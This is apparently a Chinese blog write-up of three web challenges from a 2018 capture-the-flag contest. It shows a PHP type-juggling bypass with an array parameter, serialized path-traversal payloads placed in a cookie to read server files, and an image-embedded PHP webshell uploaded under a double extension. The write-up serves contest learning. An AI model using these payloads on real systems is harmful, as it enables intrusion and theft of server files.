安恒5月

  1. 奇怪的恐龙特性
  2. Mynote
  3. ezupload

奇怪的恐龙特性

题目

大约在15亿年前,生活在地球上的恐龙中有一种很奇怪的恐龙,他们有一种奇怪的特性,那就是当在捕杀猎物的时候,如果猎物发出惊讶的表情的时候,他们也会发出惊讶的表情来告诉猎物“你们快要死了”,然而这种特性并没什么用处。。。因为我编不下去了。。以上这个故事是我瞎编的。。。

题目给了代码

<?php 
highlight_file(__FILE__); 
ini_set("display_error", false);  
error_reporting(0);  
$str = isset($_GET['A_A'])?$_GET['A_A']:'A_A'; 
if (strpos($_SERVER['QUERY_STRING'], "A_A") !==false) { 
    echo 'A_A,have fun'; 
} 
elseif ($str<9999999999) { 
    echo 'A_A,too small'; 
} 
elseif ((string)$str>0) { 
    echo 'A_A,too big'; 
} 
else{ 
    echo file_get_contents('flag.php'); 

} 
?>

首先第一个if判断,可以用urlencode绕过

然后我们需要知道php中的这样一个特性

php > var_dump([]>9999999999);
bool(true)
php > var_dump((string)[]>0);
bool(false)

在php中,数组[]大于任何一个数

这样就可以成功绕过验证了

php -r "var_dump([]>233333333);"

true

http://101.71.29.5:10007/?A+A[]=admin

这里有个坑,flag被注释了,需要查看源代码才能看得到flag

flag={09bc24026c987ae44a6e424479b2e3}

Mynote

这道题目一开始我死扣xss发现无路可循后面经别人小小提醒之后,原来是个炒鸡弱智的反序列化题目,不多说
上图,在robots.txt里面发现几个可疑的页面,可能有用先记录着,直接访问flag.php是个假的flag。

经过别人的提示,是反序列化以后,多抓几个包看一下 在upload页面上传图片文件,然后返回查看图片的页面发现里面多了一个关于picture参数的cookie

解码发现是个json格式的东西

这就跟反序列化联系起来了,这是一个数组类型的反序列化但直接反序列化会有报错,如下
P9MK5F.png
发现是在当前目录用的函数读取页面,于是就要目录穿越一波,于是便有了下面的操作

<?php

 $a[] = '../../controllers/Basecontrol.php';
 $b[] = '../../flag.php';
 $c[] = '../../controllers/User.php';
 $d[] = '../../controllers/Controllers.php.php';

echo urlencode(base64_encode(serialize($a)));12345678

把他们一个个弄到picturecookie里面,把回显出来的base64编码一遍遍解码,得到源码,起初一直以为后续还要代码审计。。。结果解码flag.php的源码的时候出现了真的flag。。。。。尼玛坑爹,都做好审计准备了

<?php

$flag = "flag{N4me_sPac4_Is_Int3r3st1ng}";
echo "flag{This_1S_A_F4ke_f1aG}";1234

ezupload

本题是一个中规中矩的文件上传漏洞.

打开题目链接,我们先上传一个图片文件.上传成功,回显图片的路径.

继续上传一个php文件,便发现提示It is not a image,上传失败.

我们抓包分析一下,修改Content-Type: image/jpeg,和文件后缀,还是不能上传php文件.

想到还有一种检测文件的方法,那就是文件头标志.

于是我上传了一个图片木马,即php木马隐藏在图片中,抓包,修改文件后缀名,上传成功,但是文件后缀名被改为peg

经过一番测试,发现它是自动将文件的三位后缀名替换为peg. 我们将文件名改成mu.jpg.php,上传成功,网站打开发现,mu.peg.php 解析成功. 这考虑的是apache的特性 从后往前识别

连接菜刀,拿到flag.


转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。可以在下面评论区评论,也可以邮件至 951207194@qq.com

文章标题:安恒5月

文章字数:846

本文作者:Mang0

发布时间:2018-08-25, 20:40:51

最后更新:2018-11-02, 21:52:17

原始链接:http://mang0.me/archis/18042369/

版权声明: "署名-非商用-相同方式共享 4.0" 转载请保留原文链接及作者。

目录
×

喜欢就点赞,疼爱就打赏